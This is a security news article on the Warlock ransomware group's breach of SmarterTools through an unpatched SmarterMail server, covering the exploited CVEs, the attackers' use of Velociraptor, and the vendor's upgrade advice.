Last week, SmarterTools confirmed that the Warlock (aka Storm-2603) ransomware group exploited unpatched SmarterMail instances to infiltrate networks.
Derek Curtis, the company’s chief commercial officer, said the incident occurred on January 29, 2026, when an email server that had not been updated to the latest version was compromised.
“Prior to the breach, we had approximately 30 servers/VMs with SmarterMail installed across our network,” Curtis explained. “Unfortunately, we were unaware that one VM that was set up by an employee had not been updated, which resulted in its email server being compromised, which led to the breach.”
However, SmarterTools emphasized that the breach did not affect its website, shopping cart, My Account portal, or several other services, and no business applications or account data were affected or compromised.
Approximately 12 Windows servers on the company’s office network and a secondary data center used for quality control (QC) testing have been confirmed to be affected. CEO Tim Usanti said the “attempted ransomware attack” also affected host customers using SmarterTrack.
“Host customers using SmarterTrack were most affected,” Uzanti said in another community portal threat. “This was not due to an issue with SmarterTrack itself, but rather because that environment was easier to access than others once it entered our network.”
Additionally, SmarterTools admitted that after the Warlock group gained initial access, it waited several days to gain control of the Active Directory server and create new users, and then dropped additional payloads such as Velociraptor and Locker to encrypt files.
“Once these attackers gain access, they typically install files and wait approximately six to seven days before taking further action,” Curtis said. “This explains why some customers encountered breaches even after updating. The initial breach occurred before the update, but the malicious activity was triggered later.”
Although it is currently unclear which vulnerabilities in SmarterMail were weaponized by attackers, it is worth noting that multiple flaws in the email software have been exploited in the wild: CVE-2025-52691 (CVSS score: 10.0), CVE-2026-23760, and CVE-2026-24423 (CVSS score: 9.3).
CVE-2026-23760 is an authentication bypass flaw that could allow arbitrary users to reset the password of a SmarterMail system administrator by sending a specially crafted HTTP request. CVE-2026-24423, on the other hand, exploits a weakness in the ConnectToHub API method to enable unauthenticated remote code execution (RCE).
This vulnerability was addressed in SmarterTools build 9511. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) confirmed that CVE-2026-24423 was being exploited in ransomware attacks.
In a report released Monday, cybersecurity firm ReliaQuest said it had identified activity potentially related to Warlock, including the exploitation of CVE-2026-23760 to bypass authentication and stage ransomware payloads on internet-connected systems. The attack uses initial access to download a malicious MSI installer (‘v4.msi’) from Supabase, a legitimate cloud-based backend platform, and install Velociraptor.
“This vulnerability allows an attacker to bypass authentication and reset the administrator password, but Storm-2603 chains this access with the software’s built-in ‘volume mount’ functionality to take full control of the system,” said security researcher Alexa Femminella. “During the breach, the group installs Velociraptor, a legitimate digital forensics tool used in previous campaigns, to maintain access and prepare for ransomware.”
The security community also points out that the two vulnerabilities ultimately have the same outcome. CVE-2026-23760 allows unauthenticated administrative access via the password reset API, which can be combined with mounting logic to execute code, whereas CVE-2026-24423 provides a more direct path to code execution via the API path.
The fact that attackers are pursuing the former method indicates that it likely allows malicious activity to blend into common administrative workflows and evade detection.
“By exploiting legitimate functionality (resetting a password or mounting a drive), rather than relying solely on a single ‘noisy’ exploit primitive, operators can reduce the effectiveness of detections specifically tailored to known RCE patterns,” Femminella added. “This pace of weaponization is consistent with ransomware operators quickly analyzing vendor fixes and developing working techniques shortly after release.”
SmarterMail users are encouraged to immediately upgrade to the latest version (build 9526) for optimal protection and to isolate their email servers to block lateral movement attempts used to deploy ransomware.
Source link
